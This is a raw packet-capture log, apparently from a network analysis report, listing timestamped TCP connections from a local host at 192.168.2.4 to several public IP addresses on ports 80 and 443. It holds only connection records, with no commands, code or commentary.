                                                                                                                                                                Nov 23, 2024 20:35:55.988176107 CET49745443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:55.990143061 CET49739443192.168.2.4142.250.181.100
                                                                                                                                                                Nov 23, 2024 20:35:56.035326004 CET44349739142.250.181.100192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:56.832375050 CET44349739142.250.181.100192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:56.849740982 CET44349739142.250.181.100192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:56.849805117 CET49739443192.168.2.4142.250.181.100
                                                                                                                                                                Nov 23, 2024 20:35:56.850342989 CET49739443192.168.2.4142.250.181.100
                                                                                                                                                                Nov 23, 2024 20:35:56.850361109 CET44349739142.250.181.100192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:57.089879990 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:57.110523939 CET4974880192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:57.216336012 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:57.216418028 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:57.216581106 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:57.237046003 CET804974887.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:57.237281084 CET4974880192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:57.308021069 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:57.308104992 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:57.310937881 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:57.310950041 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:57.311371088 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:57.342983961 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:57.360383034 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:58.793514013 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:58.839332104 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873433113 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873475075 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873529911 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:58.873549938 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873596907 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873631954 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873642921 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:58.873665094 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873701096 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:58.873708010 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873763084 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873806000 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:58.873811007 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873845100 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:58.873887062 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.071698904 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.071790934 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.071862936 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.076066017 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.076229095 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.076283932 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.084867954 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.084938049 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.085005045 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.093725920 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.093816996 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.093858957 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.102637053 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.102729082 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.102806091 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.111486912 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.111540079 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.111589909 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.120320082 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.120433092 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.120501995 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.129194975 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.129251957 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.129307985 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.138055086 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.138170958 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.138232946 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.146905899 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.146979094 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.147033930 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.192192078 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.192245960 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.192295074 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.195868015 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.195976019 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.196049929 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.204746008 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.204782009 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.204838037 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.253839970 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:35:59.253895044 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.253969908 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:35:59.254276991 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:35:59.254292965 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.257219076 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.257318020 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.257361889 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.259819031 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.259946108 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.259990931 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.268712997 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.268887043 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.268953085 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.311866045 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.312060118 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.312108994 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.316210032 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.316350937 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.316395998 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.325068951 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.325223923 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.325290918 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.333931923 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.334028006 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.334075928 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.338284016 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.338493109 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.338550091 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.342083931 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:35:59.342113018 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.342166901 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:35:59.342489958 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.342606068 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.342648983 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.342848063 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:35:59.342868090 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.346492052 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.346645117 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.346692085 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.350580931 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.350673914 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.350739002 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.354661942 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.407762051 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:35:59.469726086 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.469757080 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.469767094 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.469784021 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.469818115 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.469839096 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:59.469855070 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.469866037 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:59.469890118 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:59.487523079 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.487612009 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:59.487620115 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.494509935 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.494589090 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:35:59.513529062 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:35:59.513614893 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.513688087 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:35:59.513880014 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:35:59.513946056 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.514014959 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:35:59.514117002 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:35:59.514159918 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.514205933 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:35:59.514353991 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:35:59.514388084 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.514503002 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:35:59.514537096 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.514631987 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:35:59.514650106 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.633058071 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.633338928 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.633371115 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.634989023 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.635060072 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.636017084 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.636101961 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.636291981 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.636301041 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.655894041 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.656086922 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.656147957 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.659264088 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.659332991 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.659635067 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.659723997 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.659781933 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.659797907 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.688708067 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.704073906 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:00.762517929 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:00.762546062 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.762573004 CET49746443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:00.762579918 CET4434974620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.774260044 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.774468899 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:00.774482012 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.775916100 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.775983095 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:00.776933908 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:00.777019024 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.777164936 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:00.777174950 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.824388981 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.829161882 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:00.829215050 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.830115080 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:00.830744982 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.830835104 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:00.839487076 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:00.839682102 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.839965105 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:00.839976072 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.859739065 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.859951973 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:00.859983921 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.860860109 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.860908985 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:00.887517929 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:00.892580032 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:00.892652988 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.892997026 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:00.893028975 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:00.937334061 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.249191999 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.249315977 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.249394894 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.249408960 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.249439001 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.249492884 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.249526978 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.257257938 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.257337093 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.257348061 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262080908 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262208939 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262268066 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.262276888 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262366056 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262418032 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.262424946 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262506962 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262552023 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.262558937 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262942076 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.262989044 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.262996912 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.277532101 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.277620077 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.277628899 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.290262938 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.290333986 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.290343046 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.316500902 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.316509962 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.324857950 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.325014114 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.325073957 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.325103045 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.325203896 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.325254917 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.325263977 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.331760883 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.338983059 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.339041948 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.339050055 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.342447042 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.342925072 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.342988014 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.343009949 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.343092918 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.343142033 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.343147039 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.349632025 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.349694014 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.349703074 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.360330105 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.360400915 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.360405922 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.362915993 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.364635944 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.364687920 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.364691973 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.366410971 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.366452932 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.366472960 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.366506100 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.366547108 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.366600990 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.366619110 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.371505976 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.371572971 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.371579885 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.374310970 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.379939079 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.380012989 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.380029917 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.386665106 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.386729002 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.386732101 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.386745930 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.394715071 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.394731045 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.426696062 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.426696062 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.426696062 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.426717043 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.426763058 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.435650110 CET4972380192.168.2.42.20.68.201
                                                                                                                                                                Nov 23, 2024 20:36:01.442267895 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.466458082 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.466527939 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.466538906 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.474915981 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.474967957 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.474977016 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.475128889 CET44349757104.17.24.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.475178003 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.476058006 CET49757443192.168.2.4104.17.24.14
                                                                                                                                                                Nov 23, 2024 20:36:01.476083040 CET44349757104.17.24.14192.168.2.4
